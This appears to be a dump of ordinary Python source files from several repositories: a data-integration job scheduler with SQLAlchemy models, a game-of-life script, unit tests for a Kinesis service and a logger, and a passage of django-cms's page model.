for scoped in IScoped.__subclasses__():
binder.bind(
scoped,
to=scoped,
scope=threadlocal,
)
@staticmethod
def get_process_info():
return f"{current_process().name} ({os.getpid()},{os.getppid()})"
@staticmethod
def process_info():
logger = ConsoleLogger()
application_config: ApplicationConfig = IocManager.config_manager.get(ApplicationConfig)
hostname= f'-{application_config.hostname}' if (application_config.hostname is not None and application_config.hostname!='') else ''
logger.info(f"Application : {application_config.name}{hostname}")
```
#### File: base/aps/ApSchedulerJobsTable.py
```python
from infrastructor.json.BaseConverter import BaseConverter
@BaseConverter.register
class ApSchedulerJobsTableBase:
def __init__(self,
id: str = None,
next_run_time: float = None,
job_state=None,
*args, **kwargs):
super().__init__(*args, **kwargs)
self.id: str = id
self.next_run_time: float = next_run_time
self.job_state = job_state
```
#### File: base/integration/DataIntegrationConnectionDatabaseBase.py
```python
from models.base.EntityBase import EntityBase
from infrastructor.json.BaseConverter import BaseConverter
@BaseConverter.register
class DataIntegrationConnectionDatabaseBase(EntityBase):
def __init__(self,
DataIntegrationConnectionId: int = None,
Schema: str = None,
TableName: str = None,
Query: str = None,
DataIntegrationConnection=None,
*args, **kwargs):
super().__init__(*args, **kwargs)
self.DataIntegrationConnectionId: str = DataIntegrationConnectionId
self.Schema: str = Schema
self.TableName: str = TableName
self.Query: str = Query
self.DataIntegrationConnection = DataIntegrationConnection
```
#### File: base/operation/DefinitionBase.py
```python
from models.base.EntityBase import EntityBase
from infrastructor.json.BaseConverter import BaseConverter
@BaseConverter.register
class DefinitionBase(EntityBase):
def __init__(self,
Name: str = None,
Version: int = None,
Content: str = None,
IsActive: bool = None,
DataOperations = [],
DataIntegrations = [],
DataOperationJobExecutions = [],
*args, **kwargs):
super().__init__(*args, **kwargs)
self.DataOperationJobExecutions = DataOperationJobExecutions
self.DataIntegrations = DataIntegrations
self.DataOperations = DataOperations
self.Name: str = Name
self.Version: int = Version
self.Content: str = Content
self.IsActive: bool = IsActive
```
#### File: models/dto/ConnectionBasicAuthentication.py
```python
class ConnectionBasicAuthentication:
def __init__(self,
User: str = None,
Password: str = None,
):
self.User: str = User
self.Password: str = Password
```
#### File: viewmodels/connection/CreateConnectionServerModel.py
```python
from infrastructor.json.JsonConvert import JsonConvert
@JsonConvert.register
class CreateConnectionServerModel:
def __init__(self,
Host: str = None,
Port: int = None,
):
self.Host: str = Host
self.Port: int = Port
```
#### File: viewmodels/integration/CreateDataIntegrationConnectionDatabaseModel.py
```python
from infrastructor.json.JsonConvert import JsonConvert
@JsonConvert.register
class CreateDataIntegrationConnectionDatabaseModel:
def __init__(self,
Schema: str = None,
TableName: str = None,
Query: str = None,
):
self.Schema: str = Schema
self.TableName: str = TableName
self.Query: str = Query
```
#### File: process/rpc/OperationProcess.py
```python
import time
import traceback
from IocManager import IocManager
from datetime import datetime
from domain.operation.execution.services.OperationExecution import OperationExecution
from domain.operation.services.DataOperationJobService import DataOperationJobService
from infrastructor.data.RepositoryProvider import RepositoryProvider
from infrastructor.data.decorators.TransactionHandler import transaction_handler
from infrastructor.logging.SqlLogger import SqlLogger
from multiprocessing.context import Process
from models.dao.operation import DataOperation
class OperationProcess:
@transaction_handler
def start(self, data_operation_id: int, job_id: int, data_operation_job_execution_id: int):
start = time.time()
start_datetime = datetime.now()
sql_logger = SqlLogger()
sql_logger.info(f"{data_operation_id}-{job_id} Data Operations Started",
job_id=data_operation_job_execution_id)
try:
IocManager.injector.get(OperationExecution).start(data_operation_id=data_operation_id, job_id=job_id,
data_operation_job_execution_id=data_operation_job_execution_id)
sql_logger.info(
f"{data_operation_id}-{job_id} Data Operations Finished",
job_id=data_operation_job_execution_id)
except Exception as ex:
exc = traceback.format_exc() + '\n' + str(ex)
sql_logger.info(
f"{data_operation_id}-{job_id} Data Operations Finished With Error: {exc}",
job_id=data_operation_job_execution_id)
finally:
IocManager.injector.get(DataOperationJobService).check_removed_job(ap_scheduler_job_id=job_id)
end_datetime = datetime.now()
end = time.time()
sql_logger.info(
f"{data_operation_id}-{job_id} Start :{start_datetime} - End :{end_datetime} - ElapsedTime :{end - start}",
job_id=data_operation_job_execution_id)
del sql_logger
@staticmethod
def start_process(data_operation_id: int, job_id: int, data_operation_job_execution_id: int):
IocManager.initialize()
operation_process = OperationProcess()
operation_process.start(data_operation_id=data_operation_id, job_id=job_id,
data_operation_job_execution_id=data_operation_job_execution_id)
del operation_process
@transaction_handler
def start_operation_process(self, data_operation_id: int, job_id: int, data_operation_job_execution_id: int):
"""
:param job_id: Ap Scheduler Job Id
:param data_operation_id: Data Operation Id
:return:
"""
start = time.time()
start_datetime = datetime.now()
sql_logger = SqlLogger()
data_operation_query = IocManager.injector.get(RepositoryProvider).get(DataOperation).filter_by(
Id=data_operation_id)
data_operation = data_operation_query.first()
if data_operation is None:
raise Exception('Operation Not Found')
sql_logger.info(f"{data_operation_id}-{job_id}-{data_operation.Name} Execution Create started",
job_id=data_operation_job_execution_id)
operation_process = Process(target=OperationProcess.start_process,
args=(data_operation_id, job_id, data_operation_job_execution_id))
operation_process.start()
end_datetime = datetime.now()
end = time.time()
sql_logger.info(
f"{data_operation_id}-{job_id}-{data_operation.Name} Execution Create finished. Start :{start_datetime} - End :{end_datetime} - ElapsedTime :{end - start}",
job_id=data_operation_job_execution_id)
IocManager.injector.get(RepositoryProvider).close()
return
```
#### File: infrastructor/dependency/scopes.py
```python
class IDependency:
pass
class IScoped(IDependency):
pass
def __init__(self):
# print(f"{str(self)} constructed")
pass
def __del__(self):
# print(f"{str(self)} deconstructed")
pass
class ISingleton(IDependency):
pass
```
#### File: multi_processing/models/ProcessInfo.py
```python
import multiprocessing
class ProcessInfo:
def __init__(self,
Process: any = None,
SubProcessId: int = None,
IsFinished: bool = False):
self.Process: multiprocessing.Process = Process
self.SubProcessId: int = SubProcessId
self.IsFinished: bool = IsFinished
```
#### File: multi_processing/models/ProcessTask.py
```python
class ProcessTask:
def __init__(self,
Data: any = None,
SubProcessId: int = None,
IsFinished: bool = None,
IsProcessed: bool = None,
State: int = None,
Result: any = None,
Message: str = None,
Exception: Exception = None,
Traceback: bool = None):
self.Data: any = Data
self.SubProcessId: int = SubProcessId
self.IsFinished: bool = IsFinished
self.IsProcessed: bool = IsProcessed
self.State: int = State
self.Result: any = Result
self.Message: str = Message
self.Exception: Exception = Exception
self.Traceback: str = Traceback
```
#### File: models/configs/ApsConfig.py
```python
from models.configs.BaseConfig import BaseConfig
class ApsConfig(BaseConfig):
def __init__(self,
coalesce: bool = None,
max_instances: str = None,
thread_pool_executer_count: bool = None,
process_pool_executer_count: int = None,
default_misfire_grace_time_date_job: int = None,
default_misfire_grace_time_cron_job: int = None
):
self.process_pool_executer_count = process_pool_executer_count
self.thread_pool_executer_count = thread_pool_executer_count
self.max_instances = max_instances
self.coalesce = coalesce
self.default_misfire_grace_time_date_job = default_misfire_grace_time_date_job
self.default_misfire_grace_time_cron_job = default_misfire_grace_time_cron_job
def is_valid(self):
pass
```
#### File: dao/connection/ConnectionQueue.py
```python
from sqlalchemy import Column, String, Integer, ForeignKey
from sqlalchemy.orm import relationship
from IocManager import IocManager
from models.dao.Entity import Entity
class ConnectionQueue(Entity, IocManager.Base):
__tablename__ = "ConnectionQueue"
__table_args__ = {"schema": "Connection"}
ConnectionId = Column(Integer, ForeignKey('Connection.Connection.Id'))
ConnectorTypeId = Column(Integer, ForeignKey('Connection.ConnectorType.Id'))
Protocol = Column(String(100), index=False, unique=False, nullable=True)
Mechanism = Column(String(100), index=False, unique=False, nullable=True)
ConnectorType = relationship("ConnectorType", back_populates="Queues")
def __init__(self,
ConnectionId: int = None,
ConnectorTypeId: int = None,
Protocol: str = None,
Mechanism: str = None,
Connection=None,
ConnectorType=None,
*args, **kwargs):
super().__init__(*args, **kwargs)
self.ConnectionId: str = ConnectionId
self.ConnectorTypeId: str = ConnectorTypeId
self.Protocol: str = Protocol
self.Mechanism: str = Mechanism
self.Connection = Connection
self.ConnectorType = ConnectorType
```
#### File: dao/connection/ConnectionSecret.py
```python
from sqlalchemy import Column, Integer, ForeignKey
from sqlalchemy.orm import relationship
from IocManager import IocManager
from models.dao.Entity import Entity
class ConnectionSecret(Entity, IocManager.Base):
__tablename__ = "ConnectionSecret"
__table_args__ = {"schema": "Connection"}
ConnectionId = Column(Integer, ForeignKey('Connection.Connection.Id'))
SecretId = Column(Integer, ForeignKey('Secret.Secret.Id'))
Connection = relationship("Connection", back_populates="ConnectionSecrets")
Secret = relationship("Secret", back_populates="ConnectionSecrets")
def __init__(self,
ConnectionId: int = None,
SecretId: int = None,
Connection=None,
Secret=None,
*args, **kwargs):
super().__init__(*args, **kwargs)
self.ConnectionId: int = ConnectionId
self.SecretId: int = SecretId
self.Connection = Connection
self.Secret = Secret
```
#### File: dao/connection/ConnectionType.py
```python
from typing import List
from sqlalchemy import Column, String
from sqlalchemy.orm import relationship
from IocManager import IocManager
from models.dao.connection.Connection import Connection
from models.dao.connection.ConnectorType import ConnectorType
from models.dao.Entity import Entity
class ConnectionType(Entity, IocManager.Base):
__tablename__ = "ConnectionType"
__table_args__ = {"schema": "Connection"}
Name = Column(String(100), index=False, unique=True, nullable=False)
Connectors: List[ConnectorType] = relationship("ConnectorType",
back_populates="ConnectionType")
Connections: List[Connection] = relationship("Connection",
back_populates="ConnectionType")
def __init__(self,
Name: int = None,
*args, **kwargs):
super().__init__(*args, **kwargs)
self.Name: int = Name
```
#### File: dao/integration/DataIntegrationColumn.py
```python
from sqlalchemy import Column, String, Integer, ForeignKey
from sqlalchemy.orm import relationship
from IocManager import IocManager
from models.dao.Entity import Entity
class DataIntegrationColumn(Entity, IocManager.Base):
__tablename__ = "DataIntegrationColumn"
__table_args__ = {"schema": "Integration"}
DataIntegrationId = Column(Integer, ForeignKey('Integration.DataIntegration.Id'))
ResourceType = Column(String(100), index=False, unique=False, nullable=True)
SourceColumnName = Column(String(100), index=False, unique=False, nullable=True)
TargetColumnName = Column(String(100), index=False, unique=False, nullable=True)
DataIntegration = relationship("DataIntegration", back_populates="Columns")
def __init__(self,
ResourceType: str = None,
SourceColumnName: str = None,
TargetColumnName: str = None,
DataIntegration=None,
*args, **kwargs):
super().__init__(*args, **kwargs)
self.ResourceType: str = ResourceType
self.SourceColumnName: str = SourceColumnName
self.TargetColumnName: str = TargetColumnName
self.DataIntegration = DataIntegration
```
#### File: dao/operation/DataOperationIntegration.py
```python
from typing import List
from sqlalchemy import Column, Integer, ForeignKey
from sqlalchemy.orm import relationship
from IocManager import IocManager
from models.dao.Entity import Entity
from models.dao.operation.DataOperationJobExecutionIntegration import DataOperationJobExecutionIntegration
class DataOperationIntegration(Entity, IocManager.Base):
__tablename__ = "DataOperationIntegration"
__table_args__ = {"schema": "Operation"}
DataOperationId = Column(Integer, ForeignKey('Operation.DataOperation.Id'))
DataIntegrationId = Column(Integer, ForeignKey('Integration.DataIntegration.Id'))
Order = Column(Integer, index=False, unique=False, nullable=False)
Limit = Column(Integer, index=False, unique=False, nullable=False)
ProcessCount = Column(Integer, index=False, unique=False, nullable=False)
DataOperation = relationship("DataOperation", back_populates="Integrations")
DataIntegration = relationship("DataIntegration", back_populates="DataOperationIntegrations")
DataOperationJobExecutionIntegrations: List[DataOperationJobExecutionIntegration] = relationship(
"DataOperationJobExecutionIntegration",
back_populates="DataOperationIntegration")
def __init__(self,
DataOperationId: int = None,
DataIntegrationId: int = None,
Order: int = None,
Limit: int = None,
ProcessCount: int = None,
DataOperation=None,
DataIntegration=None,
*args, **kwargs):
super().__init__(*args, **kwargs)
self.DataOperationId: int = DataOperationId
self.DataIntegrationId: int = DataIntegrationId
self.Order: int = Order
self.Limit: int = Limit
self.ProcessCount: int = ProcessCount
self.DataOperation = DataOperation
self.DataIntegration = DataIntegration
```
#### File: dao/operation/DataOperationJobExecutionIntegration.py
```python
from datetime import datetime
from typing import List
from sqlalchemy import Column, Integer, ForeignKey, DateTime, String
from sqlalchemy.orm import relationship
from IocManager import IocManager
from models.dao.Entity import Entity
from models.dao.operation.DataOperationJobExecutionIntegrationEvent import DataOperationJobExecutionIntegrationEvent
class DataOperationJobExecutionIntegration(Entity, IocManager.Base):
__tablename__ = "DataOperationJobExecutionIntegration"
__table_args__ = {"schema": "Operation"}
DataOperationJobExecutionId = Column(Integer, ForeignKey('Operation.DataOperationJobExecution.Id'))
DataOperationIntegrationId = Column(Integer, ForeignKey('Operation.DataOperationIntegration.Id'))
StatusId = Column(Integer, ForeignKey('Common.Status.Id'))
StartDate = Column(DateTime, index=False, unique=False, nullable=False, default=datetime.now)
EndDate = Column(DateTime, index=False, unique=False, nullable=True)
Limit = Column(Integer, index=False, unique=False, nullable=True)
ProcessCount = Column(Integer, index=False, unique=False, nullable=True)
SourceDataCount = Column(Integer, index=False, unique=False, nullable=True)
Log = Column(String(1000), index=False, unique=False, nullable=True)
Status = relationship("Status", back_populates="DataOperationJobExecutionIntegrations")
DataOperationIntegration = relationship("DataOperationIntegration",
back_populates="DataOperationJobExecutionIntegrations")
DataOperationJobExecution = relationship("DataOperationJobExecution",
back_populates="DataOperationJobExecutionIntegrations")
DataOperationJobExecutionIntegrationEvents: List[DataOperationJobExecutionIntegrationEvent] = relationship(
"DataOperationJobExecutionIntegrationEvent",
back_populates="DataOperationJobExecutionIntegration")
def __init__(self,
DataOperationJobExecutionId: int = None,
DataOperationIntegrationId: int = None,
StatusId: int = None,
StartDate: datetime = None,
EndDate: datetime = None,
Limit: int = None,
ProcessCount: int = None,
SourceDataCount: int = None,
Log: str = None,
DataOperationIntegration: any = None,
DataOperationJobExecution: any = None,
Status: any = None,
*args, **kwargs):
super().__init__(*args, **kwargs)
self.DataOperationJobExecutionId: int = DataOperationJobExecutionId
self.DataOperationIntegrationId: int = DataOperationIntegrationId
self.StatusId: int = StatusId
self.StartDate: datetime = StartDate
self.EndDate: datetime = EndDate
self.Limit: int = Limit
self.ProcessCount: int = ProcessCount
self.SourceDataCount: int = SourceDataCount
self.Log: str = Log
self.DataOperationIntegration: any = DataOperationIntegration
self.DataOperationJobExecution: any = DataOperationJobExecution
self.Status: any = Status
```
#### File: scheduler/rpc/ProcessRpcClientService.py
```python
import rpyc
from injector import inject
from infrastructor.dependency.scopes import IScoped
from models.configs.ProcessRpcClientConfig import ProcessRpcClientConfig
class ProcessRpcClientService(IScoped):
@inject
def __init__(self,
process_rpc_client_config: ProcessRpcClientConfig,
):
self.process_rpc_client_config = process_rpc_client_config
def connect_rpc(self):
conn = rpyc.connect(self.process_rpc_client_config.host, self.process_rpc_client_config.port)
return conn
def call_job_start(self, data_operation_id,job_id,data_operation_job_execution_id ):
conn = self.connect_rpc()
job = conn.root.job_start(data_operation_id,job_id, data_operation_job_execution_id)
return job
```
#### File: scheduler/scheduler/JobSchedulerEvent.py
```python
from queue import Queue
import jsonpickle
from handlers.JobEventHandler import JobEventHandler
from infrastructor.multi_processing.ProcessManager import ProcessManager
from scheduler.JobSchedulerService import JobSchedulerService
class JobSchedulerEvent:
job_scheduler_type = None
job_event_queue: Queue = None
process_manager: ProcessManager = None
def __del__(self):
del JobSchedulerEvent.process_manager
@staticmethod
def create_event_handler():
JobSchedulerEvent.process_manager = ProcessManager()
JobSchedulerEvent.job_event_queue = JobSchedulerEvent.process_manager.create_queue()
process_kwargs = {
"event_queue": JobSchedulerEvent.job_event_queue,
}
JobSchedulerEvent.process_manager.start_processes(target_method=JobEventHandler.start_job_event_handler_process,
kwargs=process_kwargs)
def event_service_handler(func):
def inner(*args, **kwargs):
service = JobSchedulerService()
if service.job_scheduler_type is None:
service.set_job_scheduler_type(job_scheduler_type=JobSchedulerEvent.job_scheduler_type)
if service.job_event_queue is None:
service.set_job_event_queue(job_event_queue=JobSchedulerEvent.job_event_queue)
result = func(service=service, event=args[0], **kwargs)
del service
return result
return inner
@staticmethod
@event_service_handler
def listener_job_added(service: JobSchedulerService, event, *args, **kwargs):
job = service.get_job(event.job_id)
service.add_job(event)
service.add_job_event(event)
service.add_log(event, f'{job.name} added with funct_ref:{job.func_ref}, max_instances:{job.max_instances}')
@staticmethod
@event_service_handler
def listener_job_removed(service: JobSchedulerService, event, *args, **kwargs):
service.add_job_event(event)
service.remove_job(event)
service.add_log(event, f'Job removed')
@staticmethod
@event_service_handler
def listener_all_jobs_removed(service: JobSchedulerService, event, *args, **kwargs):
service.add_job_event(event)
service.remove_job(event)
service.add_log(event, f'Jobs removed')
@staticmethod
@event_service_handler
def listener_finish(service: JobSchedulerService, event, *args, **kwargs):
service.add_job_event(event)
if hasattr(event, 'exception') and event.exception:
if hasattr(event, 'traceback') and event.traceback:
service.add_log(event,
f'exception:{event.exception} traceback:{event.traceback}')
else:
service.add_log(event, f'exception:{event.exception}')
else:
retval = None
if hasattr(event, 'retval') and event.retval:
retval = event.retval
retval_string = jsonpickle.encode(retval)
service.add_log(event, f'return value:{retval_string}')
@staticmethod
@event_service_handler
def listener_job_submitted(service: JobSchedulerService, event, *args, **kwargs):
job = service.get_job(event.job_id)
next_run_time = None
if hasattr(job, 'next_run_time') and job.next_run_time:
next_run_time = job.next_run_time.strftime('%Y-%m-%d %H:%M:%S.%f')[:-3]
service.add_job_event(event)
service.update_job(event)
service.add_log(event, f'Next Run Time:{next_run_time}')
@staticmethod
@event_service_handler
def listener_job_others(service: JobSchedulerService, event, *args, **kwargs):
service.add_job_event(event)
service.add_log(event, f'')
@staticmethod
@event_service_handler
def listener_scheduler_other_events(service: JobSchedulerService, event, *args, **kwargs):
service.add_log(event, f'')
```
#### File: integrationtests/connection/TestConnectionTypeResource.py
```python
from unittest import TestCase
from tests.integrationtests.common.TestManager import TestManager
class TestConnectionTypeResource(TestCase):
def __init__(self, methodName='TestConnectionTypeResource'):
super(TestConnectionTypeResource, self).__init__(methodName)
self.test_manager = TestManager()
def test_get_connection_type(self):
response_data = self.test_manager.service_endpoints.get_connection_type()
assert response_data['IsSuccess'] == True
```
|
{
"source": "jedidiahhorne/game-of-life",
"score": 3
}
|
#### File: jedidiahhorne/game-of-life/game_of_life.py
```python
import config_with_yaml as config
from views import grid
def main():
"""
Get configs and invoke view.
"""
cfg = config.load("config.yaml")
size = cfg.getProperty("grid.size")
cells = cfg.getProperty("grid.initial_cells")
print(f"Initializing grid of size {size} with {cells} cells")
grid.show_grid(cfg)
input("Press Enter to continue...")
if __name__ == "__main__":
main()
```
|
{
"source": "jedidiahhorne/miaguila-lib",
"score": 3
}
|
#### File: ma_lib_tests/test_lib/test_kinesis_service.py
```python
from unittest import TestCase
from unittest.mock import patch, MagicMock
from miaguila.services.kinesis_service import KinesisService
class TestKinesisService(TestCase):
""" Test kinesis service """
@staticmethod
def test_kinesis_service_no_client():
""" Service should only log errors in event of connection problem """
service = KinesisService()
service.push('an event')
@patch('miaguila.services.kinesis_service.boto3')
def test_kinesis_service_client_ok(self, mock_boto3):
""" Service should only log errors in event of connection problem """
mock_boto3.client = MagicMock(return_value='boto client')
service = KinesisService()
self.assertEqual(
service._client, # pylint: disable=protected-access
'boto client',
msg='Service should instantiate client')
self.assertIsNone(
service._stream, # pylint: disable=protected-access
msg='Empty stream if settings not configured')
@staticmethod
@patch('miaguila.services.kinesis_service.boto3')
def test_kinesis_service_client_with_stream_can_push(mock_boto3):
""" Service should only log errors in event of connection problem """
mock_client = MagicMock()
mock_client.put_record = MagicMock()
mock_boto3.client = MagicMock(return_value=mock_client)
service = KinesisService()
service._stream = 'a stream' # pylint: disable=protected-access
service.push('an event')
@staticmethod
@patch('miaguila.services.kinesis_service.boto3')
def test_kinesis_service_client_with_stream_okay_if_error(mock_boto3):
""" Service should only log errors in event of connection problem """
mock_client = MagicMock()
mock_client.put_record = MagicMock()
mock_client.put_record.side_effect = Exception('Kinesis fail')
mock_boto3.client = MagicMock(return_value=mock_client)
service = KinesisService()
service._stream = 'a stream' # pylint: disable=protected-access
service.push('an event should only log if errors')
```
#### File: ma_lib_tests/test_lib/test_logger.py
```python
from unittest.mock import patch, MagicMock
from miaguila.logging.logger import logger
class TestLogger:
""" Basic log functionality """
@staticmethod
@patch('miaguila.logging.logger.requests')
def test_logger_no_data(mock_requests):
""" Log should work """
mock_requests.post = MagicMock()
logger.log('a dummy log')
@staticmethod
@patch('miaguila.logging.logger.requests')
def test_logger_some_data(mock_requests):
""" Log should work """
mock_requests.post = MagicMock()
logger.log('a dummy log', data={'some_item': 'some_log'})
@staticmethod
@patch('miaguila.logging.logger.requests')
def test_logger_error_does_nothing(mock_requests):
""" Log should work """
mock_post = MagicMock()
mock_post.side_effect = Exception('post did not work')
mock_requests.post = mock_post
logger.log('a dummy log that does not error')
```
|
{
"source": "jedie/django-cms",
"score": 2
}
|
#### File: cms/models/pagemodel.py
```python
import copy
import warnings
from collections import OrderedDict
from logging import getLogger
from os.path import join
from django.contrib.sites.models import Site
from django.core.urlresolvers import reverse
from django.db import models
from django.db.models.functions import Concat
from django.utils.encoding import force_text, python_2_unicode_compatible
from django.utils.functional import cached_property
from django.utils.timezone import now
from django.utils.translation import (
get_language,
override as force_language,
ugettext_lazy as _,
)
from cms import constants
from cms.constants import PUBLISHER_STATE_DEFAULT, PUBLISHER_STATE_PENDING, PUBLISHER_STATE_DIRTY, TEMPLATE_INHERITANCE_MAGIC
from cms.exceptions import PublicIsUnmodifiable, PublicVersionNeeded, LanguageError
from cms.models.managers import PageManager, PageNodeManager
from cms.utils import i18n
from cms.utils.conf import get_cms_setting
from cms.utils.page import get_clean_username
from cms.utils.i18n import get_current_language
from menus.menu_pool import menu_pool
from treebeard.mp_tree import MP_Node
logger = getLogger(__name__)
@python_2_unicode_compatible
class Page(models.Model):
"""
A simple hierarchical page model
"""
LIMIT_VISIBILITY_IN_MENU_CHOICES = (
(constants.VISIBILITY_USERS, _('for logged in users only')),
(constants.VISIBILITY_ANONYMOUS, _('for anonymous users only')),
)
TEMPLATE_DEFAULT = TEMPLATE_INHERITANCE_MAGIC if get_cms_setting('TEMPLATE_INHERITANCE') else get_cms_setting('TEMPLATES')[0][0]
X_FRAME_OPTIONS_INHERIT = constants.X_FRAME_OPTIONS_INHERIT
X_FRAME_OPTIONS_DENY = constants.X_FRAME_OPTIONS_DENY
X_FRAME_OPTIONS_SAMEORIGIN = constants.X_FRAME_OPTIONS_SAMEORIGIN
X_FRAME_OPTIONS_ALLOW = constants.X_FRAME_OPTIONS_ALLOW
X_FRAME_OPTIONS_CHOICES = (
(constants.X_FRAME_OPTIONS_INHERIT, _('Inherit from parent page')),
(constants.X_FRAME_OPTIONS_DENY, _('Deny')),
(constants.X_FRAME_OPTIONS_SAMEORIGIN, _('Only this website')),
(constants.X_FRAME_OPTIONS_ALLOW, _('Allow'))
)
template_choices = [(x, _(y)) for x, y in get_cms_setting('TEMPLATES')]
created_by = models.CharField(
_("created by"), max_length=constants.PAGE_USERNAME_MAX_LENGTH,
editable=False)
changed_by = models.CharField(
_("changed by"), max_length=constants.PAGE_USERNAME_MAX_LENGTH,
editable=False)
creation_date = models.DateTimeField(auto_now_add=True)
changed_date = models.DateTimeField(auto_now=True)
publication_date = models.DateTimeField(_("publication date"), null=True, blank=True, help_text=_(
'When the page should go live. Status must be "Published" for page to go live.'), db_index=True)
publication_end_date = models.DateTimeField(_("publication end date"), null=True, blank=True,
help_text=_('When to expire the page. Leave empty to never expire.'),
db_index=True)
#
# Please use toggle_in_navigation() instead of affecting this property
# directly so that the cms page cache can be invalidated as appropriate.
#
in_navigation = models.BooleanField(_("in navigation"), default=True, db_index=True)
soft_root = models.BooleanField(_("soft root"), db_index=True, default=False,
help_text=_("All ancestors will not be displayed in the navigation"))
reverse_id = models.CharField(_("id"), max_length=40, db_index=True, blank=True, null=True, help_text=_(
"A unique identifier that is used with the page_url templatetag for linking to this page"))
navigation_extenders = models.CharField(_("attached menu"), max_length=80, db_index=True, blank=True, null=True)
template = models.CharField(_("template"), max_length=100, choices=template_choices,
help_text=_('The template used to render the content.'),
default=TEMPLATE_DEFAULT)
login_required = models.BooleanField(_("login required"), default=False)
limit_visibility_in_menu = models.SmallIntegerField(_("menu visibility"), default=None, null=True, blank=True,
choices=LIMIT_VISIBILITY_IN_MENU_CHOICES, db_index=True,
help_text=_("limit when this page is visible in the menu"))
is_home = models.BooleanField(editable=False, db_index=True, default=False)
application_urls = models.CharField(_('application'), max_length=200, blank=True, null=True, db_index=True)
application_namespace = models.CharField(_('application instance name'), max_length=200, blank=True, null=True)
# Placeholders (plugins)
placeholders = models.ManyToManyField('cms.Placeholder', editable=False)
# Publisher fields
publisher_is_draft = models.BooleanField(default=True, editable=False, db_index=True)
# This is misnamed - the one-to-one relation is populated on both ends
publisher_public = models.OneToOneField(
'self',
on_delete=models.CASCADE,
related_name='publisher_draft',
null=True,
editable=False,
)
languages = models.CharField(max_length=255, editable=False, blank=True, null=True)
# X Frame Options for clickjacking protection
xframe_options = models.IntegerField(
choices=X_FRAME_OPTIONS_CHOICES,
default=get_cms_setting('DEFAULT_X_FRAME_OPTIONS'),
)
# Flag that marks a page as page-type
is_page_type = models.BooleanField(default=False)
node = models.ForeignKey(
'TreeNode',
related_name='cms_pages',
on_delete=models.CASCADE,
)
# Managers
objects = PageManager()
class Meta:
permissions = (
('view_page', 'Can view page'),
('publish_page', 'Can publish page'),
('edit_static_placeholder', 'Can edit static placeholders'),
)
unique_together = ('node', 'publisher_is_draft')
verbose_name = _('page')
verbose_name_plural = _('pages')
app_label = 'cms'
def __init__(self, *args, **kwargs):
super(Page, self).__init__(*args, **kwargs)
self.title_cache = {}
def __str__(self):
try:
title = self.get_menu_title(fallback=True)
except LanguageError:
try:
title = self.title_set.all()[0]
except IndexError:
title = None
if title is None:
title = u""
return force_text(title)
def __repr__(self):
display = '<{module}.{class_name} id={id} is_draft={is_draft} object at {location}>'.format(
module=self.__module__,
class_name=self.__class__.__name__,
id=self.pk,
is_draft=self.publisher_is_draft,
location=hex(id(self)),
)
return display
def _clear_node_cache(self):
if hasattr(self, '_node_cache'):
del self._node_cache
if hasattr(self, 'fields_cache'):
# Django >= 2.0
self.fields_cache = {}
def _clear_internal_cache(self):
self.title_cache = {}
self._clear_node_cache()
if hasattr(self, '_prefetched_objects_cache'):
del self._prefetched_objects_cache
@property
def parent(self):
warnings.warn(
'Pages no longer have a "parent" field. '
'To get the parent object of any given page, use the "parent_page" attribute. '
'This backwards compatible shim will be removed in version 3.6',
UserWarning,
)
return self.parent_page
@property
def parent_id(self):
warnings.warn(
'Pages no longer have a "parent_id" attribute. '
'To get the parent id of any given page, '
'call "pk" on the "parent_page" attribute. '
'This backwards compatible shim will be removed in version 3.6',
UserWarning,
)
if self.parent_page:
return self.parent_page.pk
return None
@property
def site(self):
warnings.warn(
'Pages no longer have a "site" field. '
'To get the site object of any given page, '
'call "site" on the page "node" object. '
'This backwards compatible shim will be removed in version 3.6',
UserWarning,
)
return self.node.site
@property
def site_id(self):
warnings.warn(
'Pages no longer have a "site_id" attribute. '
'To get the site id of any given page, '
'call "site_id" on the page "node" object. '
'This backwards compatible shim will be removed in version 3.6',
UserWarning,
)
return self.node.site_id
@cached_property
def parent_page(self):
return self.get_parent_page()
def set_as_homepage(self, user=None):
"""
Sets the given page as the homepage.
Updates the title paths for all affected pages.
Returns the old home page (if any).
"""
assert self.publisher_is_draft
if user:
changed_by = get_clean_username(user)
else:
changed_by = constants.SCRIPT_USERNAME
changed_date = now()
try:
old_home = self.__class__.objects.get(
is_home=True,
node__site=self.node.site_id,
publisher_is_draft=True,
)
except self.__class__.DoesNotExist:
old_home_tree = []
else:
old_home.update(
draft_only=False,
is_home=False,
changed_by=changed_by,
changed_date=changed_date,
)
old_home_tree = old_home._set_title_root_path()
self.update(
draft_only=False,
is_home=True,
changed_by=changed_by,
changed_date=changed_date,
)
new_home_tree = self._remove_title_root_path()
return (new_home_tree, old_home_tree)
def _update_title_path(self, language):
parent_page = self.get_parent_page()
if parent_page:
base = parent_page.get_path(language, fallback=True)
else:
base = ''
title_obj = self.get_title_obj(language, fallback=False)
new_path = title_obj.get_path_for_base(base)
title_obj.path = new_path
title_obj.save()
def _update_title_path_recursive(self, language):
assert self.publisher_is_draft
from cms.models import Title
if self.node.is_leaf() or language not in self.get_languages():
return
base = self.get_path(language, fallback=True)
pages = self.get_child_pages()
(Title
.objects
.filter(language=language, page__in=pages)
.exclude(has_url_overwrite=True)
.update(path=Concat(models.Value(base), models.Value('/'), models.F('slug'))))
for child in pages.filter(title_set__language=language).iterator():
child._update_title_path_recursive(language)
def _set_title_root_path(self):
from cms.models import Title
node_tree = TreeNode.get_tree(self.node)
page_tree = self.__class__.objects.filter(node__in=node_tree)
translations = Title.objects.filter(page__in=page_tree, has_url_overwrite=False)
for language, slug in self.title_set.values_list('language', 'slug'):
# Update the translations for all descendants of this page
# to include this page's slug as its path prefix
(translations
.filter(language=language)
.update(path=Concat(models.Value(slug), models.Value('/'), 'path')))
# Explicitly update this page's path to match its slug
# Doing this is cheaper than a TRIM call to remove the "/" characters
if self.publisher_public_id:
# include the public translation
current_translations = Title.objects.filter(page__in=[self.pk, self.publisher_public_id])
else:
current_translations = self.title_set.all()
current_translations.filter(language=language).update(path=slug)
return page_tree
def _remove_title_root_path(self):
from cms.models import Title
node_tree = TreeNode.get_tree(self.node)
page_tree = self.__class__.objects.filter(node__in=node_tree)
translations = Title.objects.filter(page__in=page_tree, has_url_overwrite=False)
for language, slug in self.title_set.values_list('language', 'slug'):
# Use 2 because of 1 indexing plus the fact we need to trim
# the "/" character.
trim_count = len(slug) + 2
sql_func = models.Func(
models.F('path'),
models.Value(trim_count),
function='substr',
)
(translations
.filter(language=language, path__startswith=slug)
.update(path=sql_func))
return page_tree
def is_dirty(self, language):
state = self.get_publisher_state(language)
return state == PUBLISHER_STATE_DIRTY or state == PUBLISHER_STATE_PENDING
def is_potential_home(self):
